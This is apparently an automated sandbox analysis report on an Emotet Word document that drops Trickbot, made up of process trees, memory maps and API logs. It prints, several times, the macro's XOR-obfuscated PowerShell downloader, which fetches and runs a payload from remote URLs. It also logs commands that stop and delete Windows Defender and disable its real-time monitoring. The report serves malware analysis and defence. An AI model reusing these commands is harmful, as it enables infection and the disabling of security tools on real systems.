Emotet Drops Trickbot (25-Jun-18) | Grouped Behavior
VTI SCORE: 100/100
Target: win7_64_sp1-mso2007 | ms_office
Classification: Exploit, Dropper, Downloader

3985bc09caa13dadf70187a20d271303c272a41404beb497ac6116a5722a05d1 (SHA256)

022543.doc

Word Document

Created at 2018-06-25 14:51:00

Notifications (1/1)

The operating system was rebooted during the analysis.

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x940 Analysis Target Medium winword.exe "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" -
#2 0xa08 Child Process Medium powershell.exe PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'') #1
#3 0xb40 Child Process Medium 280.exe "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe" #2
#4 0xb50 Child Process Medium 280.exe "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe" #3
#5 0xb64 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" #4
#6 0xb70 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" #5
#8 0x4f4 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" #6
#9 0x64 Child Process Medium oyvgkgw.exe "C:\ProgramData\oyvGkGw.exe" #6
#10 0x8a0 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" #6
#11 0x728 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" #6
#12 0x834 Child Process Medium syncpack_.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" #6
#13 0x7b4 Child Process Medium surtq5qk9h.exe "C:\ProgramData\suRtQ5QK9h.exe" #6
#14 0x62c Child Process Medium oyvgkgw.exe "C:\ProgramData\oyvGkGw.exe" #9
#15 0x13c Child Process Medium cmd.exe /c sc stop WinDefend #14
#16 0x77c Child Process Medium cmd.exe /c sc delete WinDefend #14
#17 0x648 Child Process Medium cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true #14
#18 0x914 Child Process Medium powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true #17
#19 0x9a4 Child Process Medium sc.exe sc delete WinDefend #16
#20 0x9d8 Child Process Medium sc.exe sc stop WinDefend #15
#21 0x200 RPC Server High (Elevated) dllhost.exe C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} #14
#22 0x3d4 Child Process High (Elevated) oyvhkhw.exe "C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe" #21

Behavior Information - Grouped by Category

Process #1: winword.exe
42 0
Information Value
ID #1
File Name c:\program files (x86)\microsoft office\office12\winword.exe
Command Line "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:00:52, Reason: Analysis Target
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:04:16
OS Process Information
Information Value
PID 0x940
Parent PID 0x520 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x9A0
0x99C
0x998
0x994
0x990
0x968
0x944
0x9F4
0x9F8
0x9FC
0xA04
0xA2C
0xB84
0xB90
0x85C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000000000020000 0x00020000 0x00022fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000030000 0x00030000 0x00032fff Pagefile Backed Memory Readable False False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable False False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable False False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable False False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable False False False -
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory Readable, Writable False False False -
private_0x0000000000150000 0x00150000 0x0017afff Private Memory Readable, Writable False False False -
private_0x0000000000180000 0x00180000 0x0018ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000000190000 0x00190000 0x00192fff Pagefile Backed Memory Readable False False False -
private_0x00000000001a0000 0x001a0000 0x001a3fff Private Memory Readable, Writable False False False -
private_0x00000000001b0000 0x001b0000 0x001c7fff Private Memory Readable, Writable False False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory Readable, Writable False False False -
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory Readable, Writable False False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory Readable, Writable False False False -
private_0x0000000000200000 0x00200000 0x0020ffff Private Memory - False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable False False False -
private_0x0000000000220000 0x00220000 0x0022ffff Private Memory Readable, Writable False False False -
private_0x0000000000230000 0x00230000 0x0023ffff Private Memory Readable, Writable False False False -
private_0x0000000000240000 0x00240000 0x0024ffff Private Memory Readable, Writable False False False -
private_0x0000000000250000 0x00250000 0x0034ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000000350000 0x00350000 0x004d7fff Pagefile Backed Memory Readable False False False -
private_0x00000000004e0000 0x004e0000 0x004effff Private Memory - False False False -
private_0x00000000004f0000 0x004f0000 0x004fffff Private Memory Readable, Writable False False False -
private_0x0000000000500000 0x00500000 0x0050ffff Private Memory Readable, Writable False False False -
private_0x0000000000510000 0x00510000 0x0051ffff Private Memory Readable, Writable False False False -
private_0x0000000000520000 0x00520000 0x0052ffff Private Memory Readable, Writable False False False -
private_0x0000000000530000 0x00530000 0x005affff Private Memory Readable, Writable False False False -
pagefile_0x00000000005b0000 0x005b0000 0x00730fff Pagefile Backed Memory Readable False False False -
private_0x0000000000740000 0x00740000 0x0074ffff Private Memory Readable, Writable False False False -
private_0x0000000000750000 0x00750000 0x0075ffff Private Memory Readable, Writable False False False -
private_0x0000000000760000 0x00760000 0x0076ffff Private Memory Readable, Writable False False False -
private_0x0000000000770000 0x00770000 0x0077ffff Private Memory Readable, Writable False False False -
private_0x0000000000780000 0x00780000 0x0078ffff Private Memory Readable, Writable False False False -
private_0x0000000000790000 0x00790000 0x0088ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000000890000 0x00890000 0x01c8ffff Pagefile Backed Memory Readable False False False -
office.odf 0x01c90000 0x01ec9fff Memory Mapped File Readable False False False -
pagefile_0x0000000001ed0000 0x01ed0000 0x01faefff Pagefile Backed Memory Readable False False False -
private_0x0000000001fb0000 0x01fb0000 0x01feffff Private Memory Readable, Writable False False False -
private_0x0000000001ff0000 0x01ff0000 0x01ffffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002000000 0x02000000 0x02001fff Pagefile Backed Memory Readable False False False -
sortdefault.nls 0x02010000 0x022defff Memory Mapped File Readable False False False -
private_0x00000000022e0000 0x022e0000 0x022fffff Private Memory Readable, Writable False False False -
private_0x0000000002300000 0x02300000 0x0230ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002310000 0x02310000 0x02310fff Pagefile Backed Memory Readable False False False -
private_0x0000000002320000 0x02320000 0x0232ffff Private Memory Readable, Writable False False False -
private_0x0000000002330000 0x02330000 0x0233ffff Private Memory Readable, Writable False False False -
private_0x0000000002340000 0x02340000 0x0234ffff Private Memory Readable, Writable False False False -
private_0x0000000002350000 0x02350000 0x0235ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002360000 0x02360000 0x02360fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000002370000 0x02370000 0x0237ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002380000 0x02380000 0x02386fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000002390000 0x02390000 0x02391fff Pagefile Backed Memory Readable, Writable False False False -
private_0x00000000023a0000 0x023a0000 0x023a0fff Private Memory Readable, Writable, Executable False False False -
private_0x00000000023b0000 0x023b0000 0x023b0fff Private Memory Readable, Writable False False False -
pagefile_0x00000000023c0000 0x023c0000 0x023c0fff Pagefile Backed Memory Readable False False False -
private_0x00000000023d0000 0x023d0000 0x023dffff Private Memory Readable, Writable False False False -
private_0x00000000023e0000 0x023e0000 0x023effff Private Memory Readable, Writable False False False -
private_0x00000000023f0000 0x023f0000 0x0242ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002430000 0x02430000 0x02430fff Pagefile Backed Memory Readable False False False -
private_0x0000000002440000 0x02440000 0x0247ffff Private Memory Readable, Writable False False False -
staticcache.dat 0x02480000 0x02daffff Memory Mapped File Readable False False False -
pagefile_0x0000000002db0000 0x02db0000 0x02db0fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000002dc0000 0x02dc0000 0x02dc0fff Pagefile Backed Memory Readable False False False -
private_0x0000000002dd0000 0x02dd0000 0x02ddffff Private Memory Readable, Writable False False False -
private_0x0000000002de0000 0x02de0000 0x02deffff Private Memory Readable, Writable False False False -
private_0x0000000002df0000 0x02df0000 0x02dfffff Private Memory Readable, Writable False False False -
private_0x0000000002e00000 0x02e00000 0x02e0ffff Private Memory Readable, Writable False False False -
private_0x0000000002e10000 0x02e10000 0x02e1ffff Private Memory Readable, Writable False False False -
private_0x0000000002e20000 0x02e20000 0x02e2ffff Private Memory Readable, Writable False False False -
private_0x0000000002e30000 0x02e30000 0x02e3ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002e40000 0x02e40000 0x02e41fff Pagefile Backed Memory Readable False False False -
private_0x0000000002e50000 0x02e50000 0x02e5ffff Private Memory Readable, Writable False False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x02e60000 0x02e7efff Memory Mapped File Readable False False False -
pagefile_0x0000000002e80000 0x02e80000 0x02e80fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000002e90000 0x02e90000 0x02e9ffff Private Memory Readable, Writable False False False -
private_0x0000000002ea0000 0x02ea0000 0x02edffff Private Memory Readable, Writable, Executable False False False -
msxml5r.dll 0x02ee0000 0x02ef6fff Memory Mapped File Readable False False False -
private_0x0000000002f00000 0x02f00000 0x02f0ffff Private Memory Readable, Writable False False False -
private_0x0000000002f10000 0x02f10000 0x02f1ffff Private Memory Readable, Writable False False False -
private_0x0000000002f20000 0x02f20000 0x02f2ffff Private Memory Readable, Writable False False False -
private_0x0000000002f30000 0x02f30000 0x02faffff Private Memory Readable, Writable False False False -
private_0x0000000002fb0000 0x02fb0000 0x02fbffff Private Memory Readable, Writable False False False -
private_0x0000000002fc0000 0x02fc0000 0x02ffffff Private Memory Readable, Writable False False False -
private_0x0000000003000000 0x03000000 0x0303ffff Private Memory Readable, Writable False False False -
private_0x0000000003040000 0x03040000 0x0304ffff Private Memory Readable, Writable False False False -
private_0x0000000003050000 0x03050000 0x0305ffff Private Memory Readable, Writable False False False -
private_0x0000000003060000 0x03060000 0x0306ffff Private Memory Readable, Writable False False False -
private_0x0000000003070000 0x03070000 0x0307ffff Private Memory Readable, Writable False False False -
private_0x0000000003080000 0x03080000 0x0308ffff Private Memory Readable, Writable False False False -
private_0x0000000003090000 0x03090000 0x030cffff Private Memory Readable, Writable, Executable False False False -
pagefile_0x00000000030d0000 0x030d0000 0x034c2fff Pagefile Backed Memory Readable False False False -
private_0x00000000034d0000 0x034d0000 0x034dffff Private Memory Readable, Writable False False False -
private_0x00000000034e0000 0x034e0000 0x0351ffff Private Memory Readable, Writable False False False -
private_0x0000000003520000 0x03520000 0x0352ffff Private Memory Readable, Writable False False False -
private_0x0000000003530000 0x03530000 0x0353ffff Private Memory Readable, Writable False False False -
private_0x0000000003540000 0x03540000 0x0357ffff Private Memory Readable, Writable False False False -
private_0x0000000003580000 0x03580000 0x0358ffff Private Memory Readable, Writable False False False -
private_0x0000000003590000 0x03590000 0x0359ffff Private Memory Readable, Writable False False False -
private_0x00000000035a0000 0x035a0000 0x035affff Private Memory Readable, Writable False False False -
private_0x00000000035b0000 0x035b0000 0x035effff Private Memory Readable, Writable False False False -
private_0x00000000035f0000 0x035f0000 0x0362ffff Private Memory Readable, Writable False False False -
private_0x0000000003630000 0x03630000 0x0363ffff Private Memory Readable, Writable False False False -
private_0x0000000003640000 0x03640000 0x0364efff Private Memory Readable, Writable False False False -
private_0x0000000003650000 0x03650000 0x0374ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000003750000 0x03750000 0x03b4ffff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000003b50000 0x03b50000 0x03b51fff Private Memory Readable, Writable False False False -
msctf.dll.mui 0x03b60000 0x03b60fff Memory Mapped File Readable, Writable False False False -
private_0x0000000003b70000 0x03b70000 0x03b7ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000003b80000 0x03b80000 0x03b80fff Pagefile Backed Memory Readable False False False -
private_0x0000000003b90000 0x03b90000 0x03c8ffff Private Memory Readable, Writable False False False -
private_0x0000000003c90000 0x03c90000 0x03d8ffff Private Memory Readable, Writable False False False -
kernelbase.dll.mui 0x03d90000 0x03e4ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000003e50000 0x03e50000 0x03e71fff Private Memory Readable, Writable False False False -
private_0x0000000003e80000 0x03e80000 0x03e8ffff Private Memory Readable, Writable False False False -
private_0x0000000003e90000 0x03e90000 0x0428ffff Private Memory Readable, Writable False False False -
private_0x0000000004290000 0x04290000 0x042a5fff Private Memory Readable, Writable False False False -
private_0x00000000042b0000 0x042b0000 0x042bffff Private Memory Readable, Writable False False False -
private_0x00000000042c0000 0x042c0000 0x042c5fff Private Memory Readable, Writable False False False -
private_0x00000000042d0000 0x042d0000 0x042d0fff Private Memory Readable, Writable False False False -
private_0x00000000042e0000 0x042e0000 0x0431ffff Private Memory Readable, Writable False False False -
private_0x0000000004320000 0x04320000 0x04320fff Private Memory Readable, Writable False False False -
private_0x0000000004330000 0x04330000 0x04338fff Private Memory Readable, Writable False False False -
private_0x0000000004340000 0x04340000 0x0434ffff Private Memory Readable, Writable False False False -
private_0x0000000004350000 0x04350000 0x04358fff Private Memory Readable, Writable False False False -
private_0x0000000004360000 0x04360000 0x04373fff Private Memory Readable, Writable False False False -
private_0x0000000004390000 0x04390000 0x04392fff Private Memory Readable, Writable False False False -
private_0x00000000043a0000 0x043a0000 0x043b2fff Private Memory Readable, Writable False False False -
private_0x0000000004410000 0x04410000 0x0444ffff Private Memory Readable, Writable False False False -
private_0x00000000044c0000 0x044c0000 0x045bffff Private Memory Readable, Writable False False False -
private_0x0000000004620000 0x04620000 0x0471ffff Private Memory Readable, Writable False False False -
private_0x0000000004720000 0x04720000 0x04adefff Private Memory Readable, Writable False False False -
private_0x0000000004bd0000 0x04bd0000 0x04c0ffff Private Memory Readable, Writable False False False -
private_0x0000000004c90000 0x04c90000 0x04d8ffff Private Memory Readable, Writable False False False -
private_0x0000000004d90000 0x04d90000 0x04e8ffff Private Memory Readable, Writable False False False -
winword.exe 0x2fc50000 0x2fca6fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp80.dll 0x70290000 0x70316fff Memory Mapped File Readable, Writable, Executable False False False -
msproof6.dll 0x70320000 0x703d5fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x70420000 0x7044dfff Memory Mapped File Readable, Writable, Executable False False False -
msointl.dll 0x70450000 0x70e2cfff Memory Mapped File Readable, Writable, Executable False False False -
msores.dll 0x70e30000 0x71483fff Memory Mapped File Readable, Writable, Executable False False False -
mso.dll 0x71490000 0x724a7fff Memory Mapped File Readable, Writable, Executable False False False -
oart.dll 0x724b0000 0x7322ffff Memory Mapped File Readable, Writable, Executable False False False -
wwlib.dll 0x73230000 0x742dbfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 217 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
File (4)
Operation Filename Additional Information Success Count Logfile
Create Directory C:\Users\kFT6uTQW\AppData\Local\Temp\VBE - True 1
Open STD_INPUT_HANDLE - True 1
Open STD_OUTPUT_HANDLE - True 1
Open STD_ERROR_HANDLE - True 1
Registry (1)
Operation Key Additional Information Success Count Logfile
Read Value 8804558B-B773-11d1-BC3E-0000F87552E7 data = } False 1
Process (1)
Operation Process Additional Information Success Count Logfile
Create PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'') os_pid = 0xa08, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Module (29)
Operation Module Additional Information Success Count Logfile
Load C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\1033\VBE6INTL.DLL base_address = 0x65300000 True 1
Get Handle KERNEL32.DLL base_address = 0x75fb0000 True 2
Get Handle kernel32.dll base_address = 0x75fb0000 True 1
Get Handle KERNEL32 base_address = 0x75fb0000 True 1
Get Handle c:\program files (x86)\microsoft office\office12\winword.exe base_address = 0x2fc50000 True 1
Get Handle USER32 base_address = 0x771c0000 True 1
Get Handle ole32.dll base_address = 0x75be0000 True 1
Get Filename - process_name = c:\program files (x86)\microsoft office\office12\winword.exe, file_name_orig = C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE, size = 260 True 1
Get Filename - process_name = c:\program files (x86)\microsoft office\office12\winword.exe, file_name_orig = C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL, size = 260 True 3
Get Address Unknown module name function = FlsAlloc, address_out = 0x75fc4f2b True 1
Get Address Unknown module name function = FlsGetValue, address_out = 0x75fc1252 True 1
Get Address Unknown module name function = FlsSetValue, address_out = 0x75fc4208 True 1
Get Address Unknown module name function = FlsFree, address_out = 0x75fc359f True 1
Get Address Unknown module name function = InitializeCriticalSectionAndSpinCount, address_out = 0x75fc1916 True 1
Get Address Unknown module name function = EncodePointer, address_out = 0x77c20fcb True 1
Get Address Unknown module name function = DecodePointer, address_out = 0x77c19d35 True 1
Get Address Unknown module name function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Get Address Unknown module name function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Get Address Unknown module name function = MonitorFromWindow, address_out = 0x771e3150 True 1
Get Address Unknown module name function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Get Address Unknown module name function = MonitorFromPoint, address_out = 0x771e5281 True 1
Get Address Unknown module name function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Get Address Unknown module name function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Get Address Unknown module name function = EnumDisplayDevicesA, address_out = 0x771e4572 True 1
Get Address Unknown module name function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Get Address Unknown module name function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
System (6)
Operation Additional Information Success Count Logfile
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Get Time type = Local Time, time = 2018-06-26 00:52:11 (Local Time) True 1
Get Time type = Local Time, time = 2018-06-26 00:52:13 (Local Time) True 1
Get Info type = Operating System True 2
Get Info type = Operating System True 1
Environment (1)
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Data
Process #2: powershell.exe
761 34
Information Value
ID #2
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'')
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:01:06, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:04:02
OS Process Information
Information Value
PID 0xa08
Parent PID 0x940 (c:\program files (x86)\microsoft office\office12\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xA0C
0xA20
0xA24
0xA28
0xA30
0xA34
0xA90
0xAA0
0xAA4
0xAA8
0xB3C
0xB48
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x00080000 0x00082fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
locale.nls 0x000d0000 0x00136fff Memory Mapped File Readable False False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x0019ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False -
